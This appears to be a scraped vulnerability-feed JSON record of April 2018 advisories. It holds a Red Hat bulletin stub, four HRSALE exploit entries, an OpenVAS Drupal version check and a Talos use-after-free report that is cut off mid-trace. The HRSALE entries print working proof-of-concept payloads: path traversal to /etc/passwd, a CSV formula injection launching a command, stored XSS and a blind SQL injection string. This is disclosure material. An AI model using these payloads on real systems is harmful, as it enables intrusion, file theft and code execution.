"reporter": "RedHat", "published": "2018-04-26T00:09:30", "type": "redhat", "title": "(RHSA-2018:1252) Important: kernel security and bug fix update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-2929", "CVE-2017-5715"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-26T00:11:33", "id": "RHSA-2018:1252", "href": "https://access.redhat.com/errata/RHSA-2018:1252", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-26T03:28:11", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10260"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30256", "href": "https://0day.today/exploit/description/30256", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10260\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nLocal File Inclusion vulnerability found logged as low privileged user.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\nLFI:\r\n \r\nhttp://localhost/[path]/admin/download?type=task&filename=../../../../../../../../etc/passwd\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30256"}, {"lastseen": "2018-04-26T03:28:34", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM v1.0.2 - CSV Injection Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10257"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30254", "href": "https://0day.today/exploit/description/30254", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - CSV Injection\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10257\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nA user is able to inject a command that will be included in the exported CSV file.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\n1. Login with employee user credentials\r\n2. Browse to My Profile and add =cmd|'/C calc'!A1 into the First Name field\r\n3. Log in with admin's credentials\r\n4. Browse to Core HR > Employees Last Login\r\n5. Click on the CSV button to download and open the exported CSV file\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30254"}, {"lastseen": "2018-04-26T03:27:42", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10259"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30255", "href": "https://0day.today/exploit/description/30255", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross Site Scripting\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10259\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nAuthenticated Stored XSS vulnerability found logged as low privileged user.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\nAuthenticated Stored XSS:\r\n \r\nDashboard > My Profile. Write the payload on the 'First Name' input field:\r\njohn doe<script>alert()</script>\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30255"}, {"lastseen": "2018-04-26T03:27:53", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "8bitsec", "published": "2018-04-26T00:00:00", "title": "HRSALE The Ultimate HRM v1.0.2 - award_id SQL Injection Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10256"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30257", "href": "https://0day.today/exploit/description/30257", "sourceData": "# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection\r\n# Exploit Author: 8bitsec\r\n# CVE: CVE-2018-10256\r\n# Vendor Homepage: https://codecanyon.net/\r\n# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619\r\n# Version: 1.0.2\r\n# Tested on: [Kali Linux 2.0 | Mac OS 10.13]\r\n \r\nRelease Date:\r\n=============\r\n2018-04-23\r\n \r\nProduct & Service Introduction:\r\n===============================\r\nHRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.\r\n \r\nTechnical Details & Description:\r\n================================\r\n \r\nSQL injection on [award_id] parameter.\r\n \r\nProof of Concept (PoC):\r\n=======================\r\n \r\nSQLi:\r\n \r\nhttps://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS\r\n \r\nParameter: award_id (GET)\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS\n\n# 0day.today [2018-04-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30257"}], "openvas": [{"lastseen": "2018-04-26T09:40:33", "references": ["https://www.drupal.org/sa-core-2018-004"], "pluginID": "1361412562310141028", "description": "Drupal is prone to a remote code execution vulnerability.", "edition": 1, "reporter": "This script is Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-04-26T00:00:00", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) - (Linux, Version Check)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 9615 2018-04-26 01:50:36Z ckuersteiner $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) - (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 9615 $\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-26 03:50:36 +0200 (Thu, 26 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name: \"qod_type\", value: \"remote_banner_unreliable\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) - (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name: \"summary\", value: \"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name: \"vuldetect\", value: \"Checks the version.\");\n\n script_tag(name: \"insight\", value: \"A remote code execution vulnerability exists within multiple subsystems of\nDrupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\ncould result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name: \"affected\", value: \"Drupal 7.x and 8.x\");\n\n script_tag(name: \"solution\", value: \"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name: \"URL\", value: \"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\",\n exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2018-04-26T17:45:02", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0527\n\n## Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3844 \n\n### Summary\n\nAn exploitable use after free exists in the DOCX to HTML conversion functionality of the Hyland Perspective Document Filters version 11.4.0.2647. A crafted DOCX document can lead to a use-after-free resulting in direct code execution.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nThis vulnerability is present in the Hyland Document filter conversion which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \nIt can convert common formats such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of a DOCX document to HTML. A specially crafted DOCX file can lead to a use-after-free and remote code execution. Let\u2019s investigate this vulnerability. After we attempt to convert a malicious DOCX using the Hyland library we see the following state:\n \n \n //page heap is turned on +hpa\n windbg.exe isys_doc2text.exe --html malicious.docx\n \n (448c.13a8): Access violation - code c0000005 (first/second chance not available)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n Time Travel Position: 31815B:0\n eax=289aaff0 ebx=289aaff0 ecx=24f40f90 edx=62f058a0 esi=00000080 edi=63299690\n eip=62f058ac esp=0084e148 ebp=0084e150 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246\n ISYSreadershd!IGR_ImageExport+0x2c084c:\n 62f058ac 8b01 mov eax,dword ptr [ecx] ds:002b:24f40f90=63123300\n \n\nShowing more context\n \n \n 62f058a0 55 push ebp\n 62f058a1 8bec mov ebp,esp\n 62f058a3 8b4904 mov ecx,dword ptr [ecx+4]\n 62f058a6 ff750c push dword ptr [ebp+0Ch]\n 62f058a9 ff7508 push dword ptr [ebp+8]\n 62f058ac 8b01 mov eax,dword ptr [ecx]\n 62f058ae ff5008 call dword ptr [eax+8]\n 62f058b1 33c9 xor ecx,ecx\n 62f058b3 3b450c cmp eax,dword ptr [ebp+0Ch]\n 62f058b6 0f94c0 sete al\n 62f058b9 5d pop ebp\n 62f058ba c20800 ret 8\n \n\nWe see an obvious attempt of a virtual function call on a previously freed object. Further examination confirms our assumptions:\n \n \n 0:000> !heap -p -a ecx\n address 24f40f90 found in\n _DPH_HEAP_ROOT @ 167b1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 29892208: 24f40000 2000\n 641bab22 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77845958 ntdll!RtlDebugFreeHeap+0x0000003c\n 777f5c1d ntdll!RtlpFreeHeap+0x0005619d\n 7779fa0d ntdll!RtlFreeHeap+0x000007cd\n 63046591 ISYSreadershd!IGR_ImageExport+0x00401531\n 63010792 ISYSreadershd!IGR_ImageExport+0x003cb732\n 62b451f9 ISYSreadershd!IGR_HtmlExport+0x002f5c09\n 62aa3853 ISYSreadershd!IGR_HtmlExport+0x00254263\n 628e077d ISYSreadershd!IGR_HtmlExport+0x0009118d\n 62aa25b8 ISYSreadershd!IGR_HtmlExport+0x00252fc8\n 62aa36de ISYSreadershd!IGR_HtmlExport+0x002540ee\n 62aa389b ISYSreadershd!IGR_HtmlExport+0x002542ab\n 62849e59 ISYSreadershd+0x000a9e59\n 6284aa1b ISYSreadershd+0x000aaa1b\n 628486e8 ISYSreadershd+0x000a86e8\n 6399d749 isysreaders+0x001dd749\n 63999c2e isysreaders+0x001d9c2e\n 63e1edd3 ISYS11df!IGR_Open_Stream_Ex+0x000000b3\n 009b892f isys_doc2text+0x0002892f\n 009b71fb isys_doc2text+0x000271fb\n 009b612f isys_doc2text+0x0002612f\n 009e4c52 isys_doc2text+0x00054c52\n 009e2cc5 isys_doc2text+0x00052cc5\n 009bcf76 isys_doc2text+0x0002cf76\n 00a97f44 isys_doc2text+0x00107f44\n 748c8654 KERNEL32!BaseThreadInitThunk+0x00000024\n 777c4a77 ntdll!__RtlUserThreadStart+0x0000002f\n 777c4a47 ntdll!_RtlUserThreadStart+0x0000001b\n \n\nChecking the Linux version we can obtain a bit more information from partial-symbols :\n \n \n [----------------------------------registers-----------------------------------]\n RAX: 0x7ffff3104188 (:CSkiaStreamBridge+168>: 0x00007ffff2d612b0)\n RBX: 0x8 \n RCX: 0x0 \n RDX: 0x8 \n RSI: 0x7fffffffa590 --> 0xa1a0a0d474e5089 \n RDI: 0x6ea4e0 --> 0x6cf010 --> 0x0 \n RBP: 0x6d6c30 --> 0x5 \n RSP: 0x7fffffffa560 --> 0x8 \n RIP: 0x7ffff2d60de8 (:CSkiaStreamBridge::write(void const*, unsigned long)+8>: 0x39481850ff078b48)\n R8 : 0x6 \n R9 : 0x0 \n R10: 0x6d6c30 --> 0x5 \n R11: 0x7ffff2be3950 --> 0x6c8948e8245c8948 \n R12: 0x7fffffffa590 --> 0xa1a0a0d474e5089 \n R13: 0x6d6c30 --> 0x5 \n R14: 0x0 \n R15: 0x7fffffffafb0 --> 0x7ffff3104188 (:CSkiaStreamBridge+168>: 0x00007ffff2d612b0)\n EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0x7ffff2d60de0 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)>: push rbx\n 0x7ffff2d60de1 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+1>: mov rdi,QWORD PTR [rdi+0x18]\n 0x7ffff2d60de5 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+5>: mov rbx,rdx\n => 0x7ffff2d60de8 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+8>: mov rax,QWORD PTR [rdi]\n 0x7ffff2d60deb <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+11>: call QWORD PTR [rax+0x18]\n 0x7ffff2d60dee <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+14>: cmp rax,rbx\n 0x7ffff2d60df1 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+17>: pop rbx\n 0x7ffff2d60df2 <ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long)+18>: sete al\n [------------------------------------stack-------------------------------------]\n 0000| 0x7fffffffa560 --> 0x8 \n 0008| 0x7fffffffa568 --> 0x7ffff2be3980 --> 0x241c8b481374c084 \n 0016| 0x7fffffffa570 --> 0x6d6c30 --> 0x5 \n 0024| 0x7fffffffa578 --> 0x6d6c30 --> 0x5 \n 0032| 0x7fffffffa580 --> 0x64 ('d')\n 0040| 0x7fffffffa588 --> 0x7ffff2881736 --> 0x77020000026dbb80 \n 0048| 0x7fffffffa590 --> 0xa1a0a0d474e5089 \n 0056| 0x7fffffffa598 --> 0x68dd90 --> 0x7ffff5b62780 --> 0x44f2894902f98341 \n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n \n \n //Use After Free call stack\n #0 in ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned int) () from ./libISYSgraphics.so\n #1 in sk_write_fn(png_struct_def*, unsigned char*, unsigned int) () from ./libISYSgraphics.so\n #2 in png_write_data () from ./libISYSgraphics.so\n #3 in png_write_sig () from ./libISYSgraphics.so\n #4 in png_write_info_before_PLTE () from ./libISYSgraphics.so\n #5 in png_write_info () from ./libISYSgraphics.so\n #6 in SkPNGImageEncoder::doEncode(SkWStream*, SkBitmap const&, bool const&, int, int, SkBitmap::Config, png_color_8_struct&, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #7 in SkPNGImageEncoder::onEncode(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #8 in SkImageEncoder::encodeStream(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #9 in SkImageEncoder::EncodeStream(SkWStream*, SkBitmap const&, SkImageEncoder::Type, int, SkImageEncoderDetails const*) () from ./libISYSgraphics.so\n #10 in CairoPNGCanvas::closeCanvas() () from ./libISYSreadershd.so\n #11 in common::EscherDraw::closeCanvas() () from ./libISYSreadershd.so\n #12 in TextHtmlWriter::addDrawing(intermediate::common::IDrawing*) () from ./libISYSreadershd.so\n #13 in TextHtmlWriter::writeParasRunObjects(std::list<intermediate::common::IObject*, std::allocator<intermediate::common::IObject*> >, double*, double*) () from ./libISYSreadershd.so\n #14 in TextHtmlWriter::writeParagraph(WriterBaseStream&, intermediate::common::ITextParagraph*, bool, bool, bool) () from ./libISYSreadershd.so\n #15 in TextHtmlWriter::writeParagraphs(intermediate::common::ITextDocumentContent const*, WriterBaseStream&) () from ./libISYSreadershd.so\n #16 in TextHtmlWriter::writeContent(intermediate::common::ITextDocumentContent const*) () from ./libISYSreadershd.so\n #17 in TextDocumentWriter::convert() () from ./libISYSreadershd.so\n #18 in ISYS_NS::LibraryHD::CDocument::processWriter(WriterBase*) () from ./libISYSreadershd.so\n #19 in ISYS_NS::LibraryHD::CDocument::openWord(ISYS_NS::CStream*, common::tools::XMLScanner::XMLScannerType) () from ./libISYSreadershd.so\n #20 in ISYS_NS::LibraryHD::CDocument::open(IGR_Stream*, int, wchar_t const*) () from ./libISYSreadershd.so\n #21 in ISYS_NS::LibraryHD::IGR_HDAPI_Open(IGR_Stream*, int, wchar_t const*, void**, wchar_t*) () from ./libISYSreadershd.so\n #22 in ISYS_NS::exports::IGR_Open_File_FromStream(wchar_t const*, wchar_t const*, ISYS_NS::CStream*, bool, ISYS_NS::exports::Ext_Open_Options*, int, wchar_t const*, int*, int*, void**, int*, int, Error_Control_Block*) () from ./libISYSreaders.so\n #23 in ISYS_NS::exports::IGR_Open_Stream_Ex(IGR_Stream*, int, unsigned short const*, int*, int*, void**, Error_Control_Block*) () from ./libISYSreaders.so\n #24 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #25 in processStream(std::string const&, tagTIGR_Stream*, bool, int, int, bool, std::ostream&, int, double) ()\n #26 in processFile(std::string const&, int, int, bool, std::ostream&) ()\n #27 in main ()\n \n\nTracking this object\u2019s life cycle we can see its creation inside `TextHtmlWriter::addDrawing` method:\n \n \n Object allocation call stack\n \n #0 in ISYS_NS::CTemporaryStream::CTemporaryStream(wchar_t const*, unsigned int) () from ./libISYSshared.so\n #1 in TextHtmlWriter::addDrawing(intermediate::common::IDrawing*) () from ./libISYSreadershd.so\n #2 in TextHtmlWriter::writeParasRunObjects(std::list<intermediate::common::IObject*, std::allocator<intermediate::common::IObject*> >, double*, double*) () from ./libISYSreadershd.so\n #3 in TextHtmlWriter::writeParagraph(WriterBaseStream&, intermediate::common::ITextParagraph*, bool, bool, bool) () from ./libISYSreadershd.so\n #4 in TextHtmlWriter::writeParagraphs(intermediate::common::ITextDocumentContent const*, WriterBaseStream&) () from ./libISYSreadershd.so\n #5 in TextHtmlWriter::writeContent(intermediate::common::ITextDocumentContent const*) () from ./libISYSreadershd.so\n #6 in TextDocumentWriter::convert() () from ./libISYSreadershd.so\n #7 in ISYS_NS::LibraryHD::CDocument::processWriter(WriterBase*) () from ./libISYSreadershd.so\n #8 in ISYS_NS::LibraryHD::CDocument::openWord(ISYS_NS::CStream*, common::tools::XMLScanner::XMLScannerType) () from ./libISYSreadershd.so\n #9 in ISYS_NS::LibraryHD::CDocument::open(IGR_Stream*, int, wchar_t const*) () from ./libISYSreadershd.so\n #10 in ISYS_NS::LibraryHD::IGR_HDAPI_Open(IGR_Stream*, int, wchar_t const*, void**, wchar_t*) () from ./libISYSreadershd.so\n #11 in ISYS_NS::exports::IGR_Open_File_FromStream(wchar_t const*, wchar_t const*, ISYS_NS::CStream*, bool, ISYS_NS::exports::Ext_Open_Options*, int, wchar_t const*, int*, int*, void**, int*, int, Error_Control_Block*) () from ./libISYSreaders.so\n #12 in ISYS_NS::exports::IGR_Open_Stream_Ex(IGR_Stream*, int, unsigned short const*, int*, int*, void**, Error_Control_Block*) () from ./libISYSreaders.so\n #13 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #14 in processStream(std::string const&, tagTIGR_Stream*, bool, int, int, bool, std::ostream&, int, double) ()\n #15 in processFile(std::string const&, int, int, bool, std::ostream&) ()\n #16 in main ()\n \n \n \n // libISYSreadershd image base : 0xF4AE6000\n .text:F4FA1060 TextHtmlWriter::addDrawing(intermediate::common::IDrawing *) proc near\n (...)\n text:F4FA1AFB push 0A00000h ; unsigned int\n .text:F4FA1B00 push 0 ; wchar_t *\n .text:F4FA1B02 push eax ; this\n .text:F4FA1B03 call ISYS_NS::CTemporaryStream::CTemporaryStream(wchar_t const*,uint) ; VULN OBJECT\n .text:F4FA1B08 mov dword ptr [esp], 10h ; unsigned int\n .text:F4FA1B0F call operator new(uint)\n \n\nFurther during `ISYS_NS::LibraryHD::CDocument::~CDocument` object destruction inside the `sub_F4FC12A0` function we can observe a call at address `F4FC12FD` which deallocates the vulnerable object:\n \n \n sub_F4FC12A0\n (...)\n .text:F4FC12F7 sub esp, 0Ch\n .text:F4FC12FA mov eax, [edx]\n .text:F4FC12FC push edx\n .text:F4FC12FD call dword ptr [eax+4]\n .text:F4FC1300\n .text:F4FC1300 i:\n .text:F4FC1300 add esp, 10h\n .text:F4FC1303\n .text:F4FC1303 loc_F4FC1303: ; CODE XREF: sub_F4FC12A0+55\u2191j\n .text:F4FC1303 sub esp, 0Ch\n .text:F4FC1306 push esi\n .text:F4FC1307 call std::_Rb_tree_increment(std::_Rb_tree_node_base *)\n .text:F4FC130C mov esi, eax\n .text:F4FC130E add esp, 10h\n .text:F4FC1311 cmp eax, edi\n .text:F4FC1313 jnz short loc_F4FC12F0\n .text:F4FC1315\n .text:F4FC1315 loc_F4FC1315: ; CODE XREF: sub_F4FC12A0+4A\u2191j\n .text:F4FC1315 sub esp, 8\n .text:F4FC1318 mov eax, [ebp+var_10]\n .text:F4FC131B mov edx, [eax+8]\n .text:F4FC131E push edx\n .text:F4FC131F push eax\n .text:F4FC1320 call sub_F4FC4650\n .text:F4FC1325 mov eax, [ebp+arg_0]\n .text:F4FC1328 add eax, 20h ; ' '\n .text:F4FC132B mov [esp], eax\n .text:F4FC132E call common::EscherDraw::closeCanvas(void)\n \n \n Call stack for dealocation\n \n #0 0xf60a6fdb in ISYS_NS::CStream::~CStream() () from ./libISYSshared.so\n #1 0xf608ddee in ISYS_NS::CTemporaryStream::~CTemporaryStream() () from ./libISYSshared.so\n #2 0xf4fb550f in ?? () from ./libISYSreadershd.so\n #3 0xf4fc1300 in ?? () from ./libISYSreadershd.so\n #4 0xf4fbb9a8 in ?? () from ./libISYSreadershd.so\n #5 0xf4fa5da1 in ?? () from ./libISYSreadershd.so \n #6 0xf52f4dd5 in ISYS_NS::LibraryHD::CDocument::~CDocument () from ./libISYSreadershd.so\n #7 0xf52ece6b in ISYS_NS::LibraryHD::IGR_HDAPI_Open () from ./libISYSreadershd.so\n #8 0xf5973302 in ?? () from ./libISYSreaders.so\n #9 0xf597855d in ISYS_NS::exports::IGR_Open_File_FromStream () from ./libISYSreaders.so\n #10 0xf7f405e3 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #11 0x080590eb in ?? ()\n #12 0x08061690 in ?? ()\n #13 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #14 0xf617c73d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #15 0xf6188ff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #16 0xf6185524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #17 0x08054e88 in ?? ()\n #18 0xf5af6637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffb96a24, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f88880 <_dl_fini>, stack_end=0xffb96a1c) at ../csu/libc-start.c:291\n #19 0x080531b1 in ?? ()\n \n\nNext, few instruction below at `F4FC132E` a call to `common::EscherDraw::closeCanvas` method is made:\n \n \n .text:F4FC1325 mov eax, [ebp+arg_0]\n .text:F4FC1328 add eax, 20h ; ' '\n .text:F4FC132B mov [esp], eax\n .text:F4FC132E call common::EscherDraw::closeCanvas(void)\n \n\nwhich internally as we could see on the `Use After Free call stack` listing calls `ISYS_NS::CSkiaStreamBridge::write` causing in the same way re-usage of the freed stream object. An attacker who properly manipulates the heap state between object deallocation and its re-usage can easily turn this use after free vulnerability into arbitrary code execution.\n\n### Crash Information\n \n \n ==24951== Command: ./isys_doc2text --html --no-images -o /tmp/dump /home/icewall/Advisory/perceptive/malicous.docx\n ==24951== \n [1] File type: Microsoft Word (25); Capabilities: 15 - /home/icewall/Advisory/perceptive/malicous.docx\n ==24951== Invalid read of size 8\n ==24951== at 0xA7F3DE8: ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67697F: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA314735: png_write_sig (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA32420A: png_write_info_before_PLTE (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA324396: png_write_info (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA6776CD: SkPNGImageEncoder::doEncode(SkWStream*, SkBitmap const&, bool const&, int, int, SkBitmap::Config, png_color_8_struct&, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA677B11: SkPNGImageEncoder::onEncode(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 